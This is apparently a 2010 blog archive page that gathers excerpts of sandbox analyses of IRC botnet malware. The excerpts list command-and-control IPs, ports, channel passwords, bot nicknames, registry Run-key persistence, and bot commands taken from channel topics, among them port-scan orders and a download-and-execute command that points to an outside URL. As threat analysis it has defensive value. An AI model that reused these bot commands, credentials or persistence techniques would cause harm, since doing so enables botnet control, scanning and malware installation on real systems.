Month: August 2010

Remote Host Port Number 62.193.249.122 3305 PASS secretpass NICK P|zmm6xnq61 USER bv41i7oge * 0 :USA|XP|932 USERHOST P|zmm6xnq61 MODE P|zmm6xnq61 JOIN #mm RSA Other details * The following ports were open in the system: Port Protocol Process 69 UDP unwise_.exe (%FontsDir%unwise_.exe) 1053 TCP unwise_.exe (%FontsDir%unwise_.exe) 38045 TCP unwise_.exe (%FontsDir%unwise_.exe) Registry Modifications * The following Registry KeysRead more...

Remote Host Port Number 74.3.255.162 81 NICK n[USA|XP]7375347 USER s “” “lol” :s JOIN #newbin# PONG 422 JOIN #USA (null) * The following port was open in the system: Port Protocol Process 1055 TCP lmsn.exe (%AppData%lmsn.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows System Guard = “%AppData%lmsn.exe” so thatRead more...

Remote Host Port Number 92.243.12.218 3211 92.243.21.78 3211 92.243.22.188 3211 NICK {NEW}[USA][XP-SP2]801696 NICK [USA][XP-SP2]784622 USER VirUs “” “lol” :4628 NICK [USA][XP-SP2]957255 USER VirUs “” “lol” :6212 USER VirUs “” “lol” :3708 NICK [USA][XP-SP2]707206 USER VirUs “” “lol” :6114 NICK [USA][XP-SP2]028704 USER VirUs “” “lol” :3165 NICK [USA][XP-SP2]934755 USER VirUs “” “lol” :7750 NICK 9552 NICKRead more...

Remote Host Port Number 92.243.22.188 3211 NICK {NOVY}[USA][XP-SP2]864460 USER VirUs “” “lol” :3037 JOIN #sWo2# VrX PRIVMSG #sWo2# :Registry/Processes cleaned. PONG :kindly.dont.suspend Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Driver Control Manager v1.0 = “%Temp%MCDT.exe” so that MCDT.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Driver Control Manager v1.0Read more...

Remote Host Port Number 204.13.248.70 80 72.233.89.200 80 92.38.226.3 80 92.241.164.101 47221 PASS weed PRIVMSG {iNF-00-USA-XP-CX @ :186.5kb downloaded to C:DOCUME~1UserNameLOCALS~1Temptempfile05130.exe (93.3kbps) QUIT Updating… NICK {iNF-00-USA-XP-COMP-6189} USER blaze * 0 :COMP JOIN #crimbot NICK {00-USA-XP-COMP-8330} * The data identified by the following URLs was then requested from the remote web server: o http://checkip.dyndns.org/ o http://www.whatismyip.com/Read more...

Remote Host Port Number 67.210.170.178 4676 USER dpvaji dpvaji dpvaji :gcgdshoooukvmzmx NICK d[TjTDCXB]b Other details * The following port was open in the system: Port Protocol Process 1055 TCP winamp.exe (%System%winamp.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Winamp Agent = “%System%winamp.exe” so that winamp.exe runs every time Windows startsRead more...

value.strangled.net:6667 join #d33#

tbt1.crabdance.com:9595 90.188.2.98:9595 Nick: :{00-AUS-XP-pc8-0563} Username: TbT Joined Channel: ##go with Password ri0t Channel Topic for Channel ##go: “@scan svrsvc_ESP 40 8 0 -b |@scan svrsvc_FRA 40 8 0 -b” Private Message to User {iNF-00-AUS-XP-pxd0xf8@: “^C14[^C12|^C09Scan^C12|^C14] Sequential Port Scan started on 192.168.0.0:445 with a delay of 8 seconds for 0 minutes using 40 threads.”

im.maximum-irc.info:9595 Channel:##!!MM!!## Channel:#!!INFO!!# Password: jessica Topic is ‘.yo-dl http://www.infantaterrible.com/home/dn.exe C:dn.exe 1 -s’ Set by _value on Thu Aug 19 00:07:26

aftermovie.ircaftermath.com DNS_TYPE_A 94.23.154.167 94.23.154.167:6667 Nick: [00|USA|XP|SP3]-3720 Username: fwct Joined Channel: ##vnc## Channel Topic for Channel ##vnc##: “.find vnc-5900 300 5 0 82x.x.x -b” Private Message to Channel ##vnc##: “vnc-5900 for 0 minutes 5 delay 300 threads” Private Message to Channel ##vnc##: “.9-.1::.0[.12 ScAnAgE.0 ].1::.9-. already 301 threads. too many specified”